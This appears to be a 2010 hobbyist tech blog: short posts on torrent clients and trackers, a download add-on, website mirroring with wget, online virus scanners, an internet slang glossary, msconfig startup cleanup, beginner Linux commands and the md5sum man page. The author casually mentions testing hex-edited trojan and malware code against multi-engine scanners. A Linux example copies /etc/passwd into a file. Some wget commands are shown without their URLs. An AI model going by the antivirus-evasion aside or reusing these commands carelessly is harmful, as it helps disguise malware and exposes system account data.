When you are on a page containing links to images or movies, you can download some or all of them at once. Moving the mouse over the items in the menu will highlights the links directly in the page to make sure they are the ones you want to pick up.

DownloadHelper also allows you to download files one by one, so that you keep bandwidth to surf for other stuff to download.

To modify your preferences, like changing the download directory, right-click on the icon and choose "Preferences".

Download This Addon


Toddler Keys- Protect your computer from children

Toddler Keys is a program that protect your computer from children by accident pressing wrong buttons or keys or mouse clicks.

It is a useful tool for parents that allows you to lock your computer keyboard, CD drive doors and power-off button. When the keyboard is used it will display images and play sounds every time a key is pressed, thereby preventing access to the desktop and applications, while adding some entertainment value for the kid.

To exit the locked screen, just type the word QUIT.

Download Toddler Keys

Go to Toddler Keys Home


Finding more trackers to speed up torrents download

In this post, I'll give you the way of speeding of your torrent download by finding more trackers of your torrent.

A BitTorrent tracker is a server that assists in the communication between peers using the BitTorrent protocol. It is also, in the absence of extensions to the original protocol, the only major critical point, as clients are required to communicate with the tracker to initiate downloads. Clients that have already begun downloading also communicate with the tracker periodically to negotiate with newer peers and provide statistics; however, after the initial reception of peer data, peer communication can continue without a tracker.

The site allows you to search for the torrent files and can be used to find all the trackers for the utorrent. The following steps describe how to find and add more trackers for speeding up your torrent download.

1) Go to torrent meta-search engine.

2) Search whatever you need and open the suitable torrent from the results.

3) I assume you reach the page similar to the following.
In this page, search for the "You can get a µTorrent compatible list here." text. On clicking this link, you'll get the list of all the trackers for that file.

4) Now copy the whole trackers from the page.

5) In utorrent, double click the required torrent and you'll get the new child window. There in the General tab, you'll see trackers label.

6) Paste the trackers at the end of the label.

Do not worry about the duplicate trackers. This should increase the speed for your torrent file.
Have fun. :)


Wednesday, 6 October 2010

List of BitTorrent Clients

This post is an attempt to provide you the list of the different torrent clients available for use. Tell us which one is your personal favourite.

1) uTorrent: The simplest, speedy, free and very popular bittorrent client and my personal favourite.

2) ABC (Yet Another Bittorrent Client): ABC is a free software, open source BitTorrent client based on BitTornado. ABC does not appear to be under development any more and thus appears to be dead software. The last version released was version 3.1 which was released on 2 Oct 2005.

3) Bit Comet: a BitTorrent/HTTP/FTP download management software, which is powerful, fast, very easy-to-use, and completely FREE. The advanced features it contains can accelerate your downloading speed up to 5 - 10 times faster, or even more.

4) Bitlet: BitLet, abbreviation for BitTorrent Applet, is a BitTorrent program that enables the use of this file sharing protocol inside any Java-enabled web browser, without the need of an external dedicated client program.

5) Bitlord: BitLord is a BitTorrent client written in C++ for Microsoft Windows. BitLord Pro is a recent "commercial" release of BitLord.

6) Bits on Wheels: Bits on Wheels is a Mac OS X BitTorrent client. It features a live 3D view of the active swarm, later used by Azureus, now known as Vuze. Written in Objective C and cocoa, it is the first MAC OS X client.

7) Bit tornado: Just another BitTorrent client with encryption support. fast protocol coming soon...

8) BitTorrent: First client for the Bittorrent protocol, it is perfect for all the platform windows, Linux and Mac.

9) BitTyrant: a new, protocol compatible BitTorrent client that is optimized for fast download performance.

10) Deluge: a BitTorrent client, created using Python and GTK+ (through PyGTK). Deluge is currently usable on POSIX-compliant operating systems. It is intended to bring a native, full-featured client to GTK desktop environments such as GNOME and Xfce. An official Windows port has been available since 13-Mar-2009. The program uses the libtorrent C++ library through official Python bindings.

11) Flashget: a windows download manager with the capability of downloading torrents.

12) Gnome BitTorrent: Another torrent client for LINUX OS

13) Transmission: with native Mac, GTK+ and Qt GUI clients, a fast, easy and multiplatform torrent client.

14) Vuze: Powerful bittorrent client previously known as azureus.

15) Ktorrent: a BitTorrent client written in C++ for KDE using the Qt user interface toolkit.

16) Xunlei: a download manager and bittorrent client developed by Xunlei corporation. Very popular in China.

Any important addition I've forgotten, please leave the comments below.


Resetting uTorrent settings [Based on XP]

If you want to delete all the uTorrent settings and torrents, you can use this method. I've tested this in Windows XP and it should be similar in other OSes except that the utorrent folder might be placed in different folders.

* Note: This will delete all the torrents and settings of utorrent.

Go to your

C:\Documents and Settings\<username>\Application Data

folder in the file explorer.

Note that Application Data is the hidden folder so you might need to turn on visibility of the hidden files and folders from the folder options

There, you will see a folder utorrent. Delete this folder and all your utorrent settings will be reset.
Have fun. :)


Sunday, 3 October 2010

Online Virus Scanners [Multi Scanners]

If you get suspicious with any file in your PC and want to scan it with multiple antivirus engines, you don't have to go on downloading and installing all the antivirus tools but you can use online alternatives for this purpose.

There are few online service that enables you to scan suspicious files with several anti-virus programs. Some of them are:

a) This one is what I use and I use it for testint the trojan and malware codes after my hex editings. Go to Novirusthanks Multi-Engine Scanner

b) Another multi-scanning online service. Go to VirusTotal Multi-Engine Scanner

c) Jotti's malware scan: Never tried this myself... Go to Jotti's Multi-Engine Scanner

I hope you find this post useful... :)


Download the full website [Complete Offline Mirroring]

This post will show you how to download the full website and have the complete offline mirror of any website you want.


wget is the Linux terminal command that can be used as a not-interactive network retriever. This tool can be used to download the full website using the switch -r for recursive download.
The command for the complete mirroring is as belows:

wget -r -p


wget -mr

If you want to mirror without following to the other sites link, you can enter the command as:

wget -mrnp

If you are on windows, you can use wget for windows from HERE

Using other tools

There are several tools available for making the offline copies of any website.
One of them is HTTrack website copier which is licensed under GPL. You can download this software from HERE

Another such tool is BlackWidow which can be used to scan a site and create a complete profile of the site’s structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf , PHP, CGI, HTM to MIME types from any web sites. You can download this software from HERE

Have fun.. :)


Saturday, 2 October 2010

Collection of the internet Lang/slang words

This page lists many of the acronyms used in the digital world. Originally taken from some other site and full credit to that site.

1337 (written in ASCII) - From the word Leet, derived from the word elite
2 - too, or to
4 - For

AFAICR/S/T - As far as I can recall / remember / see / tel
AFAIK - As far as I know
AFK - Away from keyboard
ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.
ASAP - As soon as possible
ASL - Age / sex / location
ATEOTD - At The End of the Day
ATM - At the moment
AWOL - Absent Without (Official) Leave
AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B2B - Business to Business
B& and/or B7- Banned
BBIAB - Be back in a bit
BBL/S - Be back later / shortly / soon
BCNU - Be seein' you
Blog - Also known as web log or an online journal
BOFH - ~censored~ operator from hell
Bot - Any type of automated software in chatrooms and web-cataloging software
BRB - Be right back
BSOD - Blue Screen of Death
BTDT - Been there done that
BTW - By the way
Bump - Increment (For example, C's ++ operator.)or a backronym for "Bring Up My Post"

Crawl - To retrieve a web page along with the hyperlinks that reference it
Crapplet - A poorly written computer application
CU - See you (later)
CYA - See ya OR Cover Your Ass
Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer
Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes 'jacked into'

DFTT - Don't feed the trolls
DGAF - Don't Give A ~censored~
DIAF - Die in a fire
DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / ~love~
DND - Do not disturb
DOA - Dead on arrival. Refers to hardware that is broken on delivery.

EOF - End Of File
EOM - End of Message
EOL - End of Life. Device or hardware that is at the end of its product life cycle.
EQ - EverQuest
ETA - Estimated time of arrival

FAQ - Frequently Asked Question(s)
FFS - For ~censored~'s sake
Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as an Internet troll[3]
FMCDH - From My Cold Dead Hands
FOAD - ~censored~ off and die
FOAF - Friend of a friend
FTL - For the loss
FTW - For the win
FU - ~censored~ you
FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced "foo-bar")
FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)
FWIW - For what it's worth
FYI - For your information

GBTW - Get back to work
GF - Great/good fight/girlfriend
GFU - Good for you
GFY - Go ~censored~ yourself
GG - Good game, used at or near the conclusion of a gaming match
GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill
GMTA - Great minds think alike
Godwin's Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler
Gratz - Congratulations
GTFO - Get the ~censored~ out
GTG or G2G - 'Got to go' or 'Good to go'
GR -Good Race
GR8 - Great

HAND - Have A Nice Day
Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)
HF - Have fun
Haxor or H4x0r (1337) - Hacker
Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.
Home page - The website's introduction page, starting point, and guide. The technical term is "index"
Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.
HTH - Hope this / that helps
H8 - Hate

IANAL - I am not a lawyer
IBTL - In before the lock
IDC - I don't care
IDK - I don't know
IIRC - If I recall / remember correctly
IIUC - If I understand correctly
IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion
Information superhighway - The Internet (AKA: I-way, infobahn)
IONO - I don't know
IOW - In other words
IRC - Internet Relay Chat
IRL - In real life
ITYM - I Think You Mean
IWSN - I want sex now
IYKWIM - If you know what I mean

Jaggy - Aliased computer graphics
JK or j/k - Just kidding, or joke
JFGI - Just ~censored~/Freaking Google It

k or kk - OK
KISS - Keep it simple stupid.
KS(ing) - Kill-Steal(ing)
KOS - Kill on sight
KTHX - OK, thanks
KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine
L8R - Later, L8R also sometimes abbreviated as L8ER is commonly used in chat rooms and other text based communications as a way of saying good bye.
Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy
Lamer - A know-nothing, one who is lame.
Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite
LFG - Looking for group
LFM - Looking for more
LM(F)AO - Laughing my (frigging) ass off
LMIRL - Let's meet in real life.
LMK - Let me know
LOL - Laughing out loud, laugh out loud
LTNS - Long time no see
Lurker - Someone who frequents a Usenet group without participating in discussions

MMORPG, MMO - Massive Multi-player Online Role Playing Game
MMOFPS - Massive Multi-player Online First Person Shooter
MOTD - Message of the day
MS - MapleStory, an MMORPG
MTFBWY - May The Force be with you
MUD - Multi-User Dungeon
MUSH - Multi-User Shared Hallucination
MYOB - Mind your own business
M8 - Mate

NE1 - "Anyone"
NFI - "No ~censored~ Idea"
Newbie, noob, or n00b - An inexperienced user of a system or game,or an annoying person.
NIFOC - Naked In Front Of Computer
NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.
NP - No problem
NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.
NVM, NVMD, or nm - Nevermind, not much

O RLY - Oh really?
OIC - Oh, I see
OFN - Old ~censored~ news
OMG - Oh my god
OMFG - Oh my ~censored~ god
OMW - On my way or Oh my word
OP - Original poster / Operator / Outpost
OS - Operating system
OT - Off topic
OTOH - On the other hand
OTP - On the phone or One true pairing

P2P - Peer to peer, or pay to play
PAW - Parents are watching
PEBKAC/PEBCAK - Problem exists between keyboard and chair
Ping - From the popular network monitoring tool, used as a greeting similar to "Are you there?".
PITA - Pain in the arse / ass
PLMK - Please let me know
PMSL - Pissing myself laughing
POS - Piece of ~love~, or parent over shoulder.
POTS - Plain old telephone service
POV - Point of view
PPL - People
PTKFGS - Punch the Keys For God's Sake
pr0n - Intentional misspelling of porn
PW - Persistent World (gaming)
pwned - Intentional misspelling of owned

QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message

Rehi (or merely re) - Hello again
RL - Real Life[3]
RO(T)FL - Rolling on (the) floor laughing
RO(T)FLMAO - Rolling on (the) floor laughing my ass off
RO(T)FLOL - Rolling on (the) floor laughing out loud
RSN - Real soon now (used sarcastically)
RTFB - Read the ~censored~ binary (or book)
RTFS - Read the ~censored~ source
RTFM/RTM - Read the (~censored~) manual

SCNR - Sorry, could not resist
sk8/sk8r - skate/skater
Smiley - Another name for emoticons
SMH - Shaking my head
SNAFU - Situation normal: all (~censored~/[3]fouled) up
Snail mail - Normal paper mail service
SOHF - Sense of humor failure
Spider - The program behind a search engine
STFU - Shut the ~censored~ up
STFW - Search the ~censored~ web

TANSTAAFL - There ain't no such thing as a free lunch
TBF - Time between failures
TBH - To be honest
TG - That's great
TGIF - Thank god it's Friday
TH(N)X, TNX or TX - Thanks
TIA - Thanks in advance
TINC - There Is No Cabal, a term discouraging conspiracy theories
TMI - Too much information
TOS - Terms of service
TTBOMK - To the best of my knowledge
TTFN - Ta ta for now
TTT - To the top, used in forums to bump a thread
TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)
TTYTT - To Tell You The Truth
Tweedler - One who has deep love for all computer related technology and gadgets
TWIMC - To Whom It May Concern
TY - Thank you
TYT - Take your time
TYVM - Thank you very much

U - You
UTFSE - Use the ~censored~ search engine


w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term "We Own the Other Team".
W/ or W/O - With or without
WB - Welcome back
W/E - Whatever
WRT - With respect / regard to
WTB - Want to buy
WTF - What the ~censored~
WTG - Way to go
WTH - What the hell
WTS - Want to sell
WTT - Want to trade
WUG - What you got?
WoW - World of Warcraft (game)
WUBU2 - What (have) you been up to?
WUU2 - What (are) you up to?
WYSIWYG - What you see is what you get
W8 - Wait
W-BB -

YARLY - Yeah Really
YHBT - You have been trolled
YKW - You know what?
YMMV - Your mileage may vary.
YTMND - You're The Man Now, Dog
YW - You're welcome.
YOYO- You're On Your Own.

ZOMG - An intentional misspelling of the acronym shorthand for "Oh My God/Gawd" and pronounced "Zoh My God/Gawd" This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG


Removing the unwanted programs from startup

Many programs such as messengers and other utilities stick up to the startup. Because of the increase in the number of startup items in your system, the startup process might become slower gradually. Also, sometimes unnecessary programs and even virii and worms might be in the startup so it can come handy when you need to speed up your system.

There are different locations from where a program can run at startup. You can refer to my previous post HERE for the startup related information.

All the startup items entries is made on the microsoft configuration utility called msconfig which can be accessed by running the msconfig command through run box. Switch to the startup tab in the msconfig utility window which lists all the programs and shortcuts that run at the startup in the background.

From here, you can remove the unnecessary programs and virus/worms startup by unchecking them. Just be careful to work correctly and note that many virus/worms have the filename similar to that of the windows system files so you'll have to be careful while editing the startup from here.

Have fun. :)


Basic Linux Commands For Beginners [Part I]

I thought I would be sharing the different linux commands from basic to advanced so that the new linux users will be benefited so I'm starting this post and I'll continue to post more commands. This is the first one with the most basic commands to use in terminal.

Note that the linux commands are case-sensitive so be careful with the case while executing the commands.


Command to change directory

cd /home: This changes the current working directory to /home. The '/' indicates the path relative to root, and the directory will be changed to "/home", no matter what directory you are in when you execute this command.

cd samar: This changes the current working directory to samar, relative to the current location which is "/home". The full path of the new working directory is "/home/samar".

cd ..: This moves to the parent directory from the current directory. Hence on executing this command, our new directory will be "/home".

cd ~: This changes the current directory to the user's home directory which is "/home/samar" for the user "samar". The ~ indicates the home directory of the currently logged in user.


List the files and folders present in the current directory

ls: List the files and folders in the current working directory except those starting with . and only show the file name.

Using the different switches such as ls -lia, ls -al would output other more information such as ownership, chmod info, etc. of the files in the current directory.


concatenate files and send the contents to the standard output. This command comes quite handy in many cases and with the use of the redirection, we can send the contents to other outputs such as files and others.

cat /etc/passwd: sends the file content of the file "/etc/passwd" to the standard output i.e. monitor.

cat /etc/passwd>/home/samar/Desktop/pass.txt: writes the content of the "/etc/passwd" file to the "/home/samar/Desktop/pass.txt" file.

cat file1 file2 > file3.txt: concatenates the content of "file1" with that of "file2" and writes to "file3.txt"

For now, I will leave you to do some study on these commands. You can use man page or info to find more about these commands(I'll leave it for you to research). Have fun. :)


Friday, 1 October 2010

Checking MD5 sum of file in Linux

Linux offers a command line tool called md5sum which can be used to find the md5 checksum of the files in LINUX.

The info md5sum displays the following information about this command.

File: *manpages*, Node: md5sum, Up: (dir)

MD5SUM(1) User Commands MD5SUM(1)

md5sum - compute and check MD5 message digest

md5sum [OPTION] [FILE]...

Print or check MD5 (128-bit) checksums. With no FILE, or when FILE is
-, read standard input.

-b, --binary
read in binary mode

-c, --check
read MD5 sums from the FILEs and check them

-t, --text
read in text mode (default)

The following two options are useful only when verifying checksums:
don't output anything, status code shows success

-w, --warn
warn about improperly formatted checksum lines

--help display this help and exit

output version information and exit

The sums are computed as described in RFC 1321. When checking, the
input should be a former output of this program. The default mode is
to print a line with checksum, a character indicating type (`*' for
binary, ` ' for text), and name for each FILE.

Written by Ulrich Drepper, Scott Miller, and David Madore.

Report bugs to .

Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU
GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

The full documentation for md5sum is maintained as a Texinfo manual.
If the info and md5sum programs are properly installed at your site,
the command

info md5sum

should give you access to the complete manual.

GNU coreutils 2008 MD5SUM(1)